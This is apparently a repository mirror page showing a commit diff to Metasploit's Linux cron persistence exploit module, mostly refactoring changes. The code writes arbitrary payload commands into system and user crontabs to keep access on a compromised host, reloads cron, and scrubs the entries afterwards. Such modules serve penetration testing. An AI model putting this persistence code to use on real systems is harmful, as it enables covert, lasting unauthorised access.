infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fixes round 2

bug/bundler_fix
h00die 2016-07-15 08:44:39 -04:00
parent 35e3fb3e2f
commit 33ce3ec3ed
1 changed files with 18 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
modules/exploits/linux/local/cron_persistence.rb
View File

@ -3,9 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/file'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
@ -31,15 +28,15 @@ class MetasploitModule < Msf::Exploit::Local
'Platform' => ['unix', 'linux'],
'Targets' =>
[
[ 'Cron', { 'path' => '/etc/cron.d' } ],
[ 'User Crontab', { 'path' => '/var/spool/cron' } ],
[ 'System Crontab', { 'path' => '/etc' } ]
[ 'Cron', { :path => '/etc/cron.d' } ],
[ 'User Crontab', { :path => '/var/spool/cron' } ],
[ 'System Crontab', { :path => '/etc' } ]
],
'DefaultTarget' => 1,
'Arch' => ARCH_CMD,
'Payload' =>
{
'BadChars' => "#%\x10\x13", # % always seems to fail, # is for comments
'BadChars' => "#%\x10\x13", # is for comments, % is for newline
'Compat' =>
{
'PayloadType' => 'cmd',
@ -68,11 +65,11 @@ class MetasploitModule < Msf::Exploit::Local
cron_regex << '(\*|[0-9]|1[0-2]|\*\/[0-9]+|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\s+'
cron_regex << '(\*\/[0-9]+|\*|[0-7]|sun|mon|tue|wed|thu|fri|sat)' # \s*
# cron_regex << '(\*\/[0-9]+|\*|[0-9]+)?'
unless datastore['TIMING'] =~ %r{#{cron_regex}}
unless datastore['TIMING'] =~ /#{cron_regex}/
fail_with(Failure::BadConfig, 'Invalid timing format')
end
cron_entry = datastore['TIMING']
if target.name =~ /User Crontab/
if target.name.include? 'User Crontab'
unless user_cron_permission?(datastore['USERNAME'])
fail_with(Failure::NoAccess, 'User denied cron via cron.deny')
end
@ -84,32 +81,34 @@ class MetasploitModule < Msf::Exploit::Local
case target.name
when 'Cron'
our_entry = Rex::Text.rand_text_alpha(10)
write_file(target.opts['path'] + "/#{our_entry}", "#{cron_entry}\n")
vprint_good("Writing #{cron_entry} to #{target.opts['path']}/#{our_entry}")
write_file("#{target.opts[:path]}/#{our_entry}", "#{cron_entry}\n")
vprint_good("Writing #{cron_entry} to #{target.opts[:path]}/#{our_entry}")
if datastore['CLEANUP']
register_file_for_cleanup("#{target.opts['path']}/#{our_entry}")
register_file_for_cleanup("#{target.opts[:path]}/#{our_entry}")
end
when 'System Crontab'
file_to_clean = "#{target.opts['path']}/crontab"
file_to_clean = "#{target.opts[:path]}/crontab"
append_file(file_to_clean, "\n#{cron_entry}\n")
vprint_good("Writing #{cron_entry} to #{file_to_clean}")
when 'User Crontab'
file_to_clean = "#{target.opts['path']}/crontabs/#{datastore['USERNAME']}"
file_to_clean = "#{target.opts[:path]}/crontabs/#{datastore['USERNAME']}"
append_file(file_to_clean, "\n#{cron_entry}\n")
vprint_good("Writing #{cron_entry} to #{file_to_clean}")
# at least on ubuntu, we need to restart cron to get this to work
# at least on ubuntu, we need to reload cron to get this to work
vprint_status('Reloading cron to pickup new entry')
cmd_exec("service cron restart")
cmd_exec("service cron reload")
end
print_status("Waiting #{datastore['WfsDelay']}sec for execution")
sleep(datastore['WfsDelay'].to_i)
Rex.sleep(datastore['WfsDelay'].to_i)
# we may need to do some cleanup, no need for cron since that uses file dropper
# we could run this on a on_successful_session, but we want cleanup even if it fails
if file_to_clean && flag && datastore['CLEANUP']
print_status("Removing our cron entry from #{file_to_clean}")
cmd_exec("perl -pi -e 's/.*#{flag}$//g' #{file_to_clean}")
cmd_exec("sed '/#{flag}$/d' #{file_to_clean} > #{file_to_clean}.new")
cmd_exec("mv #{file_to_clean}.new #{file_to_clean}")
# replaced cmd_exec("perl -pi -e 's/.*#{flag}$//g' #{file_to_clean}") in favor of sed
if target.name == 'User Crontab' # make sure we clean out of memory
cmd_exec("service cron restart")
cmd_exec("service cron reload")
end
end
end